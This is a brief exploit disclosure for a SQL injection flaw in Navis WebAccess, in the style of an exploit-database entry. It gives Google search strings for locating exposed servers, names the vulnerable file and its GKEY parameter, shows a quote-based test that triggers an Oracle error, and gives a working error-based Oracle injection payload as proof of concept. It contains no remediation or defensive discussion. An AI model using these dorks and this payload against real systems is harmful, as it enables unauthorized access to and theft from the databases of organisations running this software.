Navis WebAccess – SQL Injection

GOOGLE

inurl:GKEY= ext:do
inurl:/express/secure/Today.jsp
Vulnerability: SQL Injection
File: /express/showNotice.do
Vul Parameter: GKEY
 
================================================================================================
Test #1
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'
 
 
Response Error:
ORA-00933: SQL command not properly ended
================================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)